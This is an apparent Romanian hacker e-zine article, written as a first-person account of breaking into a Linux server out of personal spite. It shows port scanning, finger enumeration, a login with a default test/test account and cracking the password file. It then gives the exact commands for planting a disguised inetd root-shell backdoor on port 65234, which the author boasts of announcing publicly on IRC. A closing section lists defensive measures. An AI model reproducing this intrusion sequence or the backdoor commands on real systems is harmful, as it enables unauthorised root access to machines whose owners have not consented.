1. Introducere
~~~~~~~~~~~~~~
Salut. Sunt ceva zvonuri care zic ca dupa ani si ani de dezbateri, am
reusit in sfarsit sa scoatem al doilea numar. Cum banuiesc ca nu v-atzi
stresat prea mult cu bushitul serverelor NT care aveau pe ele SP3, asha
cum v-am invatzat in numarul trecut. Binee... Sa zicem ca asta nu v-a
interesat. Poate ca o sa va intereseze alte chestii... cum ar fi transcrierea
unei sesiuni de hacking. Zic hacking si nu cracking pentru ca nu am avut
scopuri distructive. Am vrut doar sa dau peste nas unuia. Nu o sa dau
in numarul asta numele serverului care a fost spart, pentru ca vreau sa
ii dau timp administratorului sau ce-o fi ala de acolo sa-si repare problemele
de securitate din retea. Dar promit ca in numarul viitor am sa fac publice
toate datele pe care le ascund acuma. Pentru a face povestea mai interesanta
pentru publicul roman ahtiat dupa telenovele, am sa spun ca toata povestea
a inceput pe IRC. Io pe IRC ma dau dialuper, ca sa po sa bag la inaintare
texte de genu: "Scuza-ma ca nu tzi-am raspuns atata timp, da' ma
disconectat serveru asta idiot... Ce ai zis mai devreme ?"
Eh... shi cu texte d'astea, unu care probabil a citit numaru anterior
din e-rohacker, ce shi-a zis... las ca-mi reseteaza iel modemu shi-mi
arata el mie, pentru ca am indraznit sa ii dau kick de pe #rocrack...
Hmmm.. zic io... Ala n-avea de unde sa shtie ca io nu ieream dialuper,
da' a inceput povestea. In primul rand...
2. Getting to work
~~~~~~~~~~~~~~~~~~
/whois _LAMER_ (vedetzi ca nici macar nick-ul lui real nu-l dau :)
| _LAMER_ ([email protected]) (Romania)
³ ircname : I'm too lame to read BitchX.doc
| channels : #rocrack #bucuresti #romania
³ server : atlanta.ga.us.undernet.org ([207.69.200.131] MindSpring Enterprises,
Inc)
Hmm... zic io... carefasazica ashea... foloseshte BitchX... 90% are un linux :))... ia sa vedem ce mai are mai departe.... hmmm... da' sa nu dau cu snifaiala de la mine... mai bine de la un icafe care are un linux pa care am io parola de root...
[BloomY@watters BloomY]$ ssh -l root icafe.cucubau.ro
[email protected]'s password:
Last login: Mon Mar 6 14:42:24 2000
There is 1 message in folder /var/spool/mail/root.
TV is chewing gum for the eyes.
-- Frank Lloyd Wright
[root@icafe root]# nmap -sS -O www.oltenita.ro
Starting nmap V. 2.12 by Fyodor ([email protected], www.insecure.org/nmap/)
Interesting ports on ns.mamadraq.ro (1.2.3.4):
Port State Protocol Service
21 open tcp ftp
22 open tcp ssh
23 open tcp telnet
25 open tcp smtp
37 open tcp time
53 open tcp domain
70 open tcp gopher
79 open tcp finger
80 open tcp http
109 open tcp pop-2
110 open tcp pop-3
111 filtered tcp sunrpc
113 open tcp auth
143 open tcp imap2
513 open tcp login
514 open tcp shell
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36
Nmap run completed -- 1 IP address (1 host up) scanned in 187 seconds
[root@icafe root]#
Hmmm... ce putem
sa ne dam seama de aici ? In primul rand, nmapu zice ca ar fi vorba de
un linux, shi mai mult, un linux foarte vechi... Nu mai shtiu ce distributzie
avea inclus kernelu asta, da' guessu meu ie ca ala care a instalat sistemul
l-a instalat default, asha cum vine iel... fara sa mai faca modificari.
Chestii de remarcat la prima vedere... In afara de server de web, mashina
asta mai ie shi POP3 server shi ns.... :)) hmmm... daca i-ash aburi io
serviciile pe acolo :))... da' mai bine nu. Hai sa vedem ce-i cu porturile...
Hmmm... telnet ? FINGER ???? Wow... Buun... daca portu de finger ie deschis
atunci am putea sa vedem cine ie logat la ora asta acolo...
[root@icafe root]# finger @www.mamadraq.ro
[ns.mamadraq.ro]
Login Name Tty Idle Login Time Office
lamer Lameru de pe undernet tty1 56 Mar 7 15:49
test p0 5 Mar 7 17:40
[root@icafe root]#
hmm... carevasazica asha :)) deci ala ie de la consola shi in plus, remote mai ie legat user test :)) Dupa cum vedetzi am inlocuit in ceea ce a zis fingeru numele real al lu ala... doar ca sa nu ii fie rushine prea mare :)). Ashea. Gata cu rautatzile, ca nu cu mult timp in urma, shi io ieream lamer, looser (nu luser), sau in ce fel vretzi voi sa zicetzi. Buun.. shi daca tot a mers chestia asta cu fingeru, hai sa vedem daca ala care a facut contu test a fost suficient de lamer sa ii puna parola tot test :))
[root@icafe root]# telnet www.mamadraq.ro
Trying 1.2.3.4...
Connected to ns.mamadraq.ro.
Escape character is '^]'.
Red Hat Linux release 5.0 (Hurricane)
Kernel 2.0.36 on an i586
login: test
Password: test
You have new mail.
[test@ns test]$
Hmm.. carevasazica ie RH5.0... shi io am intrat :(( Ma dezamageshte adminu
asta... am intrat prea ushor... Eh... acuma tot ce mai trebe sa fac ie
sa obtzin parola de root shi sa ii fac viatza amara lamerului... Pun pariu
ca asta nu are pa sistem shadow... deci ash putea incerca un password
cracker... :))
Buun... Deci mai departe am luat passwd-ul sh am dat drumu la John (pentru
aia care nu shtiu, john ie un password cracker... destul de bun. Oricum,
pentru nevoia mea shia indeplinit functziile...) Bun... da' acuma ce ma
fac daca ashtia scot contu test inainte ca io sa apuc sa fac rost de parola
de root ? Imi trebuia repede un cont valid, ca sa am timp sa imi fac magariile...
De remarcat ca John, oricat de bun ie iel nu scoate parolele ashea repede,
decat daca sunt super ushoare. Dar se pare ca sunt un tip norocos...
User: cucu
Pass: cucu123
Buun... sa incercam un ssh acuma, shi sa vedem ce exploituri am putea
folosi :))
3. Diverse exploituri, pana se spage parola de root
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hmm... sa vedem... Am citit io mai demult pe undeva de existentza unui
exploit de mount... Da' pentru asta trebe sa fie mount-ul suidat... ia
sa vedem
[cucu@ns cucu]$ ls -al /bin/mount
-rwsr-xr-x 1 root root 34424 Oct 23 1997 /bin/mount*
[cucu@ns cucu]$
uuu... Lucky me... :)) carefasazica po sa obtzin access mai ushor... ia
sa incerc... iau mount-ex.c shi incerc sa-l compilez :))
[cucu@ns cucu]$ gcc mount-ex.c
In file included from /usr/include/stdlib.h:360,
from mount-ex.c:22:
/usr/include/alloca.h:1: parse error at null character
[cucu@ns cucu]$
hmm.... nu-mi place asta... Nu ma complic sa vad ce ie cu eroarea asta...
Prima impresie ie ca librariile sunt mai vechi ca exploitu meu :)) Nashpa...
Nu-i nimica... il iau la mine shi il compilez static, ca sa ii includa
toate librariile :))Ma rog... To make a long story short, am compilat
local (gcc mount-ex.c -static), am copiat pa server shi binenintzeles
ca n-a mers.
Nu m-a descurajat pa mine chestia asta, asha ca am incercar shi un exploit
de traceroute. Bineintzeles ca nici asta nu a vrut sa mearga... Nasol..
Dar intre timp ghici ce-mi zice john al meu:
Guessed 1 password:
NubirA (root)
:))
4. Cu parola de root, la instalat backdoor-uri
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ashadar :)) aveam tot ce imi dorea sufletzelul :))... Acuma sa-i facem
ushoara viatza lu baiatu am facut un ssh pa serveru ala, sh am inceput
:))
echo 'alive 65234/tcp
# RedHat Keep Alive system' >>/etc/services
cp /bin/sh /bin/mem
chown root.root /bin/mem
chmod +xs /bin/mem
echo 'alive stream tcp nowait root /usr/sbin/tcpd /bin/mem -i' >>/etc/inetd.conf
Eh... shi acuma esplicatziile
La momentul in care scriu partea a patra din articolu asta, nu mai am
root la acel icafe, shi imi ie cam tarsha sa intru de aici pa serverul
mamadraq.ro, asha ca ma decis io ca cel mai bine ie sa citez din memorie
ce am facut acolo... Prietenii shtiu de ce :)) Eh... acuma sa va zic ce
a facut mintea mea bolnava :)). Dat fiind ca il subestimez pa adminu de
la www.mamadraq.ro, shi il banui ca habar n-ar ce-i cu serveru lui, am
bagat in /etc/services linia aia cu alive, pe care am shi comentat-o cu
"redhat keep alive system". Asha ceva nu a existat niciodata,
:)) dar mie imi place cum suna. Dupa care, i-am zis ca sa copieze /bin/sh
in /bin/mem shi sa ruleze ca root, pe portu pe care zice in /etc/services
ca ruleaza keepalive (65234), in modu cat se poate de interactiv (asta
face -i).
Adica pe limba romanului de rand :)), oricine da telnet la www.mamadraq.ro
pe portu 65234 are access root. Pe urma, pe canalu #rocrack de pe undernet,
canal pe care dupa parerea mea ar trebui sa-l vizitatzi mai des, am facut
publica magaria. din nefericire nu ierea prea multa lume pe kanal la ora
aia :)) Asha ca putzina lume shtie numele adevarat al serverului. Dar
promit ca numarul viitor spun de cine ierea vorba, shi cum se poate sa
mai datzi pe acolo.
5. In incheiere, o
vorba pentru admin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Acuma serios vorbind, io cred ca adminu de la serveru ala ie tare lamer...
sau ma rog... habar n-are de securitate in internet. Nu ca io ash avea
prea mult habar, da' io am avut mai mult noroc ca iel. intre noi fie vorba.
Treaba hackerului/crackerului ie sa sparga sistemu. Treaba adminului ie
sa-l protejeze ca sa nu fie spart. Cashtiga ala care ishi face primu treaba.
De data asta am cashtigat io. OTOH, puteam foarte ushor sa fiu lasat pe
afara, daca adminu de acolo facea nishte chestii dintre urmatoarele:
a) Punea un PortSentry, care portsentry ar fi bagat o linie de ipchains
care sa faca deny la tot ce vine de la adresa mea, imediat cum a sesizat
scanarea de porturi.
b) Nu lasa portu de finger deschis, sau punea acolo un finger masluit,
care sa nu returneze cine ie logat, ci doar sa logheze attemptu de finger
:))
c) Nu facea conturi de genu test cu parola test
d) Facea un upgrade la sistemu de operare
e) Punea un shadow, acolo sa nu poa sa citeasca tot prostu parolele criptate
f) Punea la root o parola mai lunga shi mai complicata, ca john-ul meu
a
gasit-o pasta dupa 23 de ore de cracking pe un PIII dual, cu 512M RAM.
:))
g) Macar odata pe saptamana sa mai citeasca 3 randuri de securitate.
Si sunt io de parere ca multe chestii se mai puteau face. Dar cum dupa
razboi multzi viteji s-arata, shi cum nici io nu-s un guru in ale
securitatzii, shi nici un ditamai hackeru, o las moarta. Poate povestea
asta
sa invetze ceva pa unii...
